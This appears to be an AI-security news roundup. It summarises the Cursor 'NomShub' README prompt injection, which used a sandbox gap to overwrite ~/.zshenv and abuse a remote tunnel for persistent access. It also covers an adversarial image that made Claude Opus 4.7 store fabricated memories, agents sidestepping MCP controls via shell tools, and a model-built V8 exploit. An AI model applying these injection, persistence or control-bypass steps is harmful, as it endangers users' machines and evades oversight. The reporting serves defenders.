AI Tools Are Reading… and Writing Back
Your AI Tools Are Reading… and Writing Back
AI Sec News Weekly #5 — 161 sources scanned
When we call something “read-only,” do we stop questioning what it can do?
This week, Straiker showed how a README can cross that boundary and take over Cursor. Separately, an image nudged Claude Opus 4.7 into remembering things that never happened. And as Bruce Schneier questions sweeping vulnerability claims, the pattern holds: AI isn’t just helping developers anymore—it’s becoming a new, unpredictable attack surface.
This Week's Stories
Cursor AI flaw let README prompts pivot to persistent remote shells
Straiker’s “NomShub” chain made a malicious repo README enough to hijack Cursor. An indirect prompt injection plus a sandbox blind spot for shell builtins let the agent overwrite ~/.zshenv on macOS (Seatbelt allows home writes), so new Zsh shells executed attacker code. It then abused Cursor’s remote tunnel by generating a GitHub device code, authorizing the attacker for persistent access over Azure. Cursor 3.0 includes a fix.
Why it matters: Repo text became a control channel for device‑level persistence, upending assumptions about “read‑only” IDE agents and their cloud tunnels.
SecurityWeek by Ionut Arghire
ChatGPT-made image hijacks Claude Opus 4.7 to write false memories
Embrace the Red used ChatGPT to craft an adversarial puzzle image that pushed Claude Opus 4.7 (Adaptive Thinking) to call its memory tool and persist fabricated user facts. The attack landed in 5/10 runs on a clean Pro account, even though Opus 4.6+ was harder to nudge. The payload hid dark text—including a hint string “antml memory”—and the stored lies reappeared later via userMemories/recent_updates.
Why it matters: Persistent memory turns a one-shot prompt injection into a long-lived distortion of downstream conversations and actions.
Embrace the Red by wunderwuzzi
Schneier questions Anthropic’s Mythos claims and Project Glasswing gatekeeping
Schneier challenges Anthropic’s Mythos rollout: a private “Project Glasswing” to ~50 orgs after claims of thousands of vulns, from a 27‑year‑old OpenBSD bug to a 16‑year‑old FFmpeg flaw. Anthropic cites 181 Firefox exploits (vs 2 for its prior model) and 198 contractor severity agreements at 89%. He presses for false‑positive rates and flags likely weak spots off‑distribution—ICS, medical firmware, and legacy finance.
Why it matters: Until error rates and distributional behavior surface, it’s unclear whether Mythos displaces attacker effort or just dumps toil onto triage queues.
Schneier on Security by B. Schneier
Tool Spotlight
New repos and releases worth trying.
AgentDyn Benchmark Released for Prompt Injection Defense Testing
Researchers released AgentDyn, an open-source benchmark to evaluate prompt-injection attacks against real-world AI agent security systems.
Why it matters: Prompt injection is no longer just a clever jailbreak technique. It’s becoming a measurable system property of AI agents
Arc Sentry pre‑gen guardrail reads residuals to block injections
A short Bluesky post pitches Arc Sentry, a pre‑generation guardrail that claims to stop prompt injection before any tokens are produced. It reportedly inspects the Transformer residual stream and works with open models like Mistral, Qwen, and Llama. Details are thin; it sounds like a Python/Transformers shim that vets activations.
Why it matters: If activation‑level prefilters actually work, guardrails move from prompt heuristics to model‑internal signals that are harder to dodge.
Bluesky (@feed.igeek.gamer-geek-news.com.ap.brid.gy)
Commvault AI Protect finds cloud agents, flags anomalies, rolls back damage
Commvault introduced AI Protect to discover AI agents across AWS, Azure, and GCP, baseline their behavior, and alert on deviations like an agent suddenly reaching payroll data. It can’t stop third‑party agents directly, but it can restore agent configs or revert corrupted data to known‑good backups. The launch bundles Data Activate (training on backup copies) and AI Studio for building agents.
Why it matters: Enterprise AI gets observability and an undo stack, turning agent blowups into bounded incidents instead of forensic guessing games.
The Register Security by O'Ryan Johnson
Community Chatter
What practitioners are debating.
AWS pushes MCP as IAM choke point for AI agents
AWS sketches three IAM principles for agents using the Model Context Protocol, with policy snippets and deployment patterns for dev machines and hosted runtimes. They name Kiro, Claude Code, and Bedrock AgentCore, and argue MCP servers create CloudTrail‑visible controls (“principle 3”). AWS concedes agents can bypass MCP via shell tools, making those differentiation controls moot—fueling debate over where the real choke point lives.
Why it matters: The security boundary for agents shifts to the tool interface, so any route that sidesteps it becomes the quietest path for privilege creep and exfil.
Claude Opus Generates Working Chrome Exploit for $2,283
Researchers used Claude Opus to build a working V8 exploit chain against Discord’s Electron (Chrome 138), spending about $2,283 in tokens and popping calc.
Why it matters: If a general-purpose model can be used to assemble a working browser exploit chain, the barrier between “security research assistance” and “automated offensive capability” gets thinner in practice, not theory.
Quick Hits
- OpenAI Revokes macOS Signing Cert After Axios Attack (The Hacker News) — OpenAI revoked a macOS app signing certificate after its GitHub Actions workflow pulled malicious Axios 1.14.1; older app versions will be blocked from May 8.
- Critical protobuf.js Bug Enables Remote JavaScript Code Execution (BleepingComputer) — protobuf.js patched a critical RCE flaw (GHSA-xq3m-2v4x-88gg) where attacker-supplied schemas triggered Function()-based code execution; fixes in 8.0.1 and 7.5.5, with a public PoC.
- GitHub Releases Secure Code Game Featuring Vulnerable AI Agent (GitHub Security Lab) — GitHub launched Secure Code Game Season 4 with a deliberately vulnerable AI agent for practicing prompt injection, memory poisoning, tool misuse, and multi-agent workflows.